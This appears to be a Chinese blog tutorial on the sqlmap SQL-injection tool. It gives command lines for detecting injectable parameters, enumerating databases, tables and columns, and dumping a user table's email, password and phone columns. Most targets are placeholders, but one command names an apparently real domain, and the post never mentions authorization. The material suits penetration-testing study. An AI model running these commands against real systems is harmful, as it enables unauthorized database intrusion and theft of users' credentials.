渗透神器sqlmap的使用笔记

0x00前言

sqlmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。该开源软件是国外大神的慷慨赠予。在乌云、补天等等漏洞公开平台,随处可见它的身影,也是渗透人员的必备神器。能够把这神器灵活运用,也是很厉害的一件事情。熟能生巧!!

下载地址:https://github.com/sqlmapproject/sqlmap#最快的使用,不过有点麻烦咯

集成环境:http://pan.baidu.com/s/1hssCKQS#Appie 里面安装了sqlmap

集成系统:https://www.kali.org/downloads/#kali-linux下安装有sqlmap

0x01 发现注入点

强调:sqlmap 并不擅长发现注入点,所以必须通过其他方式发现注入点。这些方式有:使用AWVS 进行漏扫、APPSCAN漏扫、burpsuite进行检测、手工挖掘(经验很重要),因为本文重点是介绍在发现注入点之后的工作,所以不对如何发现注入点进行详细介绍。我们需要使用txt文本来记录下注入点的地址和数据。作为后面参数的输入。

0x02 检测注入点

sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --random-agent

 

实践1 : 因为众多的原因,测试过程会出现很多的 “  [Y/n]  ” 之类的提示。我们可以附加参数 --batch

sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --random-agent --batch

实践2 :为了加快速度和增加检测的多样性

sqlmap -u "http://www.XXX.cn:80/ldxx/ldxx.php?pid=7" --data="item=1" --level=5 --risk=3 --ignore-proxy --delay=2 --timeout=60 --threads=6

实践3:进行表单数据注入

sqlmap -u "http://www.XXX.cn/admins" --forms 

实践4:当我们进行手机服务端的注入时

sqlmap -u "http://www.ahujhc.cn:80/ldxx/ldxx.php?pid=7" --mobile --time-sec=30

实践5:使用文本导入数据

sqlmap -r E:\temporary\www.XXX.cn.txt  --random-agent --batch --level=3 --risk=3  --timeout=60 --threads=3 --ignore-proxy --delay=2

0x03 暴力破解数据库名称和数目

sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --dbs --thread=3

 

实践1: 可以附加的参数为: --union-cols=1-30 --union-char=NULL,CHAR

sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --dbs --thread=3 --union-cols=1-30 --union-char=NULL,CHAR

实践2:列出web当前使用的数据库

sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --current-db

实践3:尽可能详细的信息

 sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" -b --current-db --privileges --is-dba --current user --roles --users --hostname --passwords --comments -v 0

 

0x04 暴力破解一个数据库中的所有表

$ sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --thread=6 -D jhxy2 --tables

0x05 读取某个数据库中个某表的所有列

$ sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --thread=6 -D jhxy2 -T web_user --columns

0x06 读取列中的具体内容

sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --thread=6 -D jhxy2 -T web_user -C "Email,Password,Tel,Uname,Username" --dump

 

实践1 :如果数据过大,可以抽取一部分数据

sqlmap -u "http://www.XXX.cn:80/ldxx/ldxx.php?pid=7" -D jhxy2 -T web_user -C" Email,Password,Tel,Uname,Username"  --start=1 --stop=10 --dump

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值